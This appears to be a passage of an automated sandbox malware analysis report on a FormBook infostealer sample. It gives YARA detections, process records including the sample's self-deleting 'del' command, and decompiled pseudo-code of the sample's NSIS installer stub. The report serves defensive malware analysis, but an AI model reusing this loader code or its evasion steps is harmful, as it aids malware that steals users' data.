00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 9952, Parent PID: 4716

General

Target ID:	5
Start time:	14:19:52
Start date:	30/03/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\ekstre.exe"
Imagebase:	0xdd0000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 9960, Parent PID: 9952

General

Target ID:	6
Start time:	14:19:52
Start date:	30/03/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62f810000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: ekstre.exePID: 1600, Parent PID: 4744COMMON

Execution Graph

Execution Coverage:	19.3%
Dynamic/Decrypted Code Coverage:	13.2%
Signature Coverage:	15.6%
Total number of Nodes:	1624
Total number of Limit Nodes:	45

Executed Functions

Function 00403640 Relevance: 81.0, APIs: 33, Strings: 13, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				intOrPtr* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				signed int _t234;

				0x4c1000 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x470318 = _v324.dwBuildNumber;
				 *0x47031c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x47031e != 0x600) {
					_t180 = E00406A35(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E004069C5(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E00406A35(0xb);
				 *0x470264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x47031c =  *0x47031c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x470320 = _t88;
				SHGetFileInfoW(0x436708, _t189,  &_v1016, 0x2b4, _t189); // executed
				E00406668(0x468260, L"NSIS Error");
				E00406668(0x4c1000, GetCommandLineW());
				_t94 = 0x4c1000;
				_t234 = 0x22;
				 *0x470260 = 0x400000;
				if( *0x4c1000 == _t234) {
					_t94 = 0x4c1002;
				}
				_t199 = CharNextW(E00405F64(_t94, 0x4c1000));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405F64(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Primnesses\\Sofabordets\\Adreamed", _t199);
										L37:
										GetTempPathW(0x2000, 0x4d5000);
										_t116 = E0040360F(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(0x4d1000); // executed
											_t118 = E004030D0(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403C25();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x4702f4 == _t189) {
														L77:
														_t120 =  *0x47030c;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E00406A35(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x47027c == _t189) {
												L51:
												 *0x47030c =  *0x47030c | 0xffffffff;
												_v24 = E00403D17(_t265);
												goto L68;
											}
											_t219 = E00405F64(0x4c1000, _t189);
											if(_t219 < 0x4c1000) {
												L48:
												_t264 = _t219 - 0x4c1000;
												_v8 = L"Error launching installer";
												if(_t219 < 0x4c1000) {
													_t190 = E00405C33(__eflags);
													lstrcatW(0x4d5000, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(0x4d5000, "A");
													}
													lstrcatW(0x4d5000, L".tmp");
													_t138 = lstrcmpiW(0x4d5000, 0x4cd000);
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(0x4d5000);
														if(_t190 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(0x4d5000);
														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Primnesses\\Sofabordets\\Adreamed"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Primnesses\\Sofabordets\\Adreamed", 0x4cd000);
														}
														E00406668(0x471000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x475000 = _t144;
														do {
															E004066A5(0, 0x432708, 0x4d5000, 0x432708,  *((intOrPtr*)( *0x470270 + 0x120)));
															DeleteFileW(0x432708);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(0x4dd000, 0x432708, "true");
																__eflags = _t149;
																if(_t149 != 0) {
																	E00406428(_t202, 0x432708, 0);
																	E004066A5(0, 0x432708, 0x4d5000, 0x432708,  *((intOrPtr*)( *0x470270 + 0x124)));
																	_t153 = E00405C4B(0x432708);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x475000 =  *0x475000 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t202, 0x4d5000, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E0040603F(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Primnesses\\Sofabordets\\Adreamed", _t222);
												E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Primnesses\\Sofabordets\\Adreamed\\Buntmagersyers\\Mamelonation", _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= 0x4c1000) {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(0x4d5000, 0x1ffb);
										lstrcatW(0x4d5000, L"\\Temp");
										_t171 = E0040360F(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x1ffc, 0x4d5000);
										lstrcatW(0x4d5000, L"Low");
										SetEnvironmentVariableW(L"TEMP", 0x4d5000);
										SetEnvironmentVariableW(L"TMP", 0x4d5000);
										_t176 = E0040360F(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x470300 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}

0x0040364e
0x0040364f
0x00403656
0x00403659
0x00403660
0x00403663
0x00403676
0x0040367c
0x0040367f
0x00403682
0x00403690
0x00403698
0x004036a3
0x004036bc
0x004036be
0x004036c6
0x004036c6
0x004036d1
0x004036d3
0x004036d3
0x004036e8
0x0040370d
0x0040371b
0x0040371e
0x00403725
0x0040372c
0x0040372c
0x00403725
0x0040372e
0x00403733
0x00403734
0x00403740
0x00403744
0x0040374b
0x00403759
0x0040375e
0x00403765
0x00403769
0x0040376d
0x0040376f
0x0040376f
0x0040376d
0x00403776
0x0040377d
0x00403783
0x0040379b
0x004037ab
0x004037bd
0x004037c4
0x004037c6
0x004037c7
0x004037d8
0x004037dc
0x004037dc
0x004037ef
0x004037f1
0x004038eb
0x004038eb
0x004038ee
0x004038f1
0x00000000
0x00000000
0x004037fb
0x004037fc
0x004037ff
0x00403808
0x00403808
0x0040380b
0x0040380e
0x00403811
0x00403814
0x00403814
0x00403814
0x00403815
0x00403819
0x004038d9
0x004038e2
0x004038e4
0x004038e7
0x004038ea
0x004038ea
0x004038ea
0x00000000
0x0040381f
0x00403820
0x00403821
0x00403825
0x0040383f
0x00403846
0x00403859
0x0040385a
0x0040386f
0x00403874
0x00403876
0x00403878
0x00403894
0x0040389b
0x004038ae
0x004038af
0x004038c4
0x004038ca
0x004038cc
0x004038ce
0x004038d6
0x004038d8
0x00000000
0x004038d8
0x004038d2
0x004038d4
0x004038f9
0x004038fd
0x00403906
0x0040390b
0x0040391c
0x0040391e
0x00403923
0x00403925
0x0040397d
0x00403982
0x0040398b
0x00403992
0x00403995
0x00403b6c
0x00403b6c
0x00403b71
0x00403b7a
0x00403b97
0x00403c0f
0x00403c0f
0x00403c17
0x00403c19
0x00403c19
0x00403c1f
0x00403c1f
0x00403bae
0x00403bba
0x00403bcb
0x00403bd2
0x00403bd9
0x00403bd9
0x00403be1
0x00403bed
0x00403bfb
0x00403c06
0x00000000
0x00000000
0x00000000
0x00403bef
0x00403bef
0x00403bf0
0x00403bf2
0x00403bf3
0x00403bf4
0x00403bf9
0x00403c08
0x00403c0a
0x00000000
0x00403c0a
0x00000000
0x00403bf9
0x00403bed
0x00403b84
0x00403b8b
0x00403b8b
0x004039a1
0x00403a48
0x00403a48
0x00403a54
0x00000000
0x00403a54
0x004039b2
0x004039ba
0x00403a0c
0x00403a0c
0x00403a12
0x00403a19
0x00403a67
0x00403a69
0x00403a6e
0x00403a70
0x00403a78
0x00403a78
0x00403a83
0x00403a8f
0x00403a95
0x00403a97
0x00403b6a
0x00403b6a
0x00403b6a
0x00000000
0x00403a9d
0x00403a9d
0x00403a9f
0x00403aa0
0x00403aa9
0x00403aa2
0x00403aa2
0x00403aa2
0x00403aaf
0x00403ab7
0x00403abe
0x00403ac6
0x00403ac6
0x00403ad3
0x00403adf
0x00403ae9
0x00403ae9
0x00403aeb
0x00403af2
0x00403afc
0x00403b08
0x00403b0e
0x00403b14
0x00403b17
0x00403b21
0x00403b27
0x00403b29
0x00403b2d
0x00403b3e
0x00403b44
0x00403b49
0x00403b4b
0x00403b4e
0x00403b54
0x00403b54
0x00403b4b
0x00403b29
0x00403b57
0x00403b5e
0x00403b5e
0x00403b5e
0x00403b5e
0x00403b65
0x00000000
0x00403b65
0x00403a97
0x00403a1b
0x00403a1e
0x00403a22
0x00403a27
0x00403a29
0x00000000
0x00000000
0x00403a35
0x00403a40
0x00403a45
0x00000000
0x00403a45
0x004039c3
0x004039db
0x004039ec
0x004039ed
0x004039f1
0x004039f3
0x00403a01
0x00403a08
0x00000000
0x00000000
0x00000000
0x00403a08
0x00403a0a
0x00000000
0x00403a0a
0x0040392d
0x00403939
0x0040393e
0x00403943
0x00403945
0x00000000
0x00000000
0x0040394d
0x00403955
0x00403966
0x0040396e
0x00403970
0x00403975
0x00403977
0x00000000
0x00000000
0x00000000
0x00403977
0x00000000
0x004038d4
0x0040387d
0x0040387f
0x00000000
0x00000000
0x00403881
0x00403885
0x00403889
0x00403890
0x00403890
0x00403890
0x00403890
0x00000000
0x00403890
0x0040388b
0x0040388e
0x00000000
0x00000000
0x00000000
0x0040388e
0x00403827
0x0040382b
0x0040382e
0x00403835
0x00403835
0x00000000
0x00403835
0x00403830
0x00403833
0x00000000
0x00000000
0x00000000
0x00403833
0x00000000
0x00000000
0x00000000
0x00403801
0x00403801
0x00403802
0x00403803
0x00403803
0x00000000
0x00403801
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403663
GetVersionExW.KERNEL32(?), ref: 0040368C
GetVersionExW.KERNEL32(0000011C), ref: 004036A3
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
OleInitialize.OLE32(00000000), ref: 0040377D
SHGetFileInfoW.SHELL32(00436708,00000000,?,000002B4,00000000), ref: 0040379B
GetCommandLineW.KERNEL32(00468260,NSIS Error), ref: 004037B0
CharNextW.USER32(00000000,004C1000,00000020,004C1000,00000000), ref: 004037E9
GetTempPathW.KERNEL32(00002000,004D5000,00000000,?), ref: 0040391C
GetWindowsDirectoryW.KERNEL32(004D5000,00001FFB), ref: 0040392D
lstrcatW.KERNEL32(004D5000,\Temp), ref: 00403939
GetTempPathW.KERNEL32(00001FFC,004D5000,004D5000,\Temp), ref: 0040394D
lstrcatW.KERNEL32(004D5000,Low), ref: 00403955
SetEnvironmentVariableW.KERNEL32(TEMP,004D5000,004D5000,Low), ref: 00403966
SetEnvironmentVariableW.KERNEL32(TMP,004D5000), ref: 0040396E
DeleteFileW.KERNELBASE(004D1000), ref: 00403982
lstrcatW.KERNEL32(004D5000,~nsu), ref: 00403A69
lstrcatW.KERNEL32(004D5000,0040A328), ref: 00403A78

Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,004D5000,004D5000,004D5000,004D5000,004D5000,00403923), ref: 00405C1C

lstrcatW.KERNEL32(004D5000,.tmp), ref: 00403A83
lstrcmpiW.KERNEL32(004D5000,004CD000,004D5000,.tmp,004D5000,~nsu,004C1000,00000000,?), ref: 00403A8F
SetCurrentDirectoryW.KERNEL32(004D5000,004D5000), ref: 00403AAF
DeleteFileW.KERNEL32(00432708,00432708,?,00471000,?), ref: 00403B0E
CopyFileW.KERNEL32(004DD000,00432708,?), ref: 00403B21
CloseHandle.KERNEL32(00000000,00432708,00432708,?,00432708,00000000), ref: 00403B4E
OleUninitialize.OLE32(?), ref: 00403B71
ExitProcess.KERNEL32 ref: 00403B8B
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
ExitProcess.KERNEL32 ref: 00403C1F

Strings

UXTHEME, xrefs: 0040372E, 00403733, 00403739
TMP, xrefs: 00403969
SeShutdownPrivilege, xrefs: 00403BB4
TEMP, xrefs: 00403961
.tmp, xrefs: 00403A7D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation, xrefs: 00403A3B
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403659
~nsu, xrefs: 00403A61
Low, xrefs: 0040394F
NSIS Error, xrefs: 004037A1
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed, xrefs: 00403901, 00403A30, 00403AB7, 00403AC1
\Temp, xrefs: 00403933
Error launching installer, xrefs: 00403A12

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: .tmp$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-3570572806
Opcode ID: e28fe4cc259f6cb24782d13de6d7922fe7310c5961053c825fffcc0129932793
Instruction ID: b7e5fe29903c30db736afe9723593e932e9124e443bf0bb46b5a7c6934f2d125
Opcode Fuzzy Hash: e28fe4cc259f6cb24782d13de6d7922fe7310c5961053c825fffcc0129932793
Instruction Fuzzy Hash: 4CE10771A00214AADB10AFB58D45B6F3EB8AB4570AF10847FF545F22D1DB7C8A81CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x468244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x446748;
								_v44 = 0x8000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x46822c == _t156) {
							ShowWindow( *0x470268, 8);
							if( *0x4702ec == _t156) {
								_t119 =  *0x43e720; // 0x71d69c
								E004056CA( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x43a718 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x468230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x470270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x468230 = GetDlgItem(_a4, 0x403);
				 *0x468228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x468244 = _t134;
				_v8 = _t134;
				E004045F9( *0x468230);
				 *0x468234 = E00404F52(4);
				 *0x46824c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x470278 & 0x00000003) != 0) {
					ShowWindow( *0x468230, _t156);
					if(( *0x470278 & 0x00000002) != 0) {
						 *0x468230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x468228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x470278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x00405811
0x00405817
0x00405821
0x00405824
0x004059ba
0x004059d7
0x004059de
0x004059de
0x004059f1
0x00405a0f
0x00405a11
0x00405a19
0x00405a6f
0x00405a73
0x00000000
0x00000000
0x00405a75
0x00405a7b
0x00000000
0x00000000
0x00405a85
0x00405a8d
0x00405a90
0x00405b92
0x00000000
0x00405b92
0x00405a9f
0x00405aaa
0x00405ab3
0x00405abe
0x00405ac1
0x00405aca
0x00405ad0
0x00405ad3
0x00405ad3
0x00405aeb
0x00405af4
0x00405af7
0x00405afe
0x00405b05
0x00405b0d
0x00405b0d
0x00405b24
0x00405b24
0x00405b2b
0x00405b31
0x00405b3d
0x00405b44
0x00405b4d
0x00405b4f
0x00405b52
0x00405b61
0x00405b64
0x00405b6a
0x00405b6b
0x00405b71
0x00405b72
0x00405b73
0x00405b7b
0x00405b86
0x00405b8c
0x00405b8c
0x00000000
0x00405aeb
0x00405a21
0x00405a51
0x00405a59
0x00405a5b
0x00405a64
0x00405a64
0x00405a6a
0x00000000
0x00405a6a
0x00405a25
0x00405a2f
0x00000000
0x004059f3
0x004059f9
0x00405a34
0x00000000
0x00405a3d
